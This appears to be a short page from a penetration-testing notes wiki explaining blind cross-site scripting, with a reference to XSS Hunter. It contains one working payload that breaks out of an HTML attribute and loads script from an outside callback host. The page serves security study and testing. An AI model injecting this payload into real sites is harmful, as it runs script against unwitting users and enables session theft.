Blind Cross-Site Scripting

Blind cross-site scripting (XSS) attacks occur when an attacker is unable to directly see the results of their XSS payload on the targeted website, but can still confirm if the payload has executed successfully or not by observing the behavior of a third-party service, such as Burp Suite's Collaborator.

Basic <script> Payload:

"><script src="https://burpcollaborator.com"></script>

References

GitHub - mandatoryprogrammer/xsshunter-express: An easy-to-setup version of XSS Hunter. Sets up in five minutes and requires no maintenance!GitHub

PreviousCross-Site Scripting (XSS)NextFinding Cross-Site Scripting

Last updated 1 year ago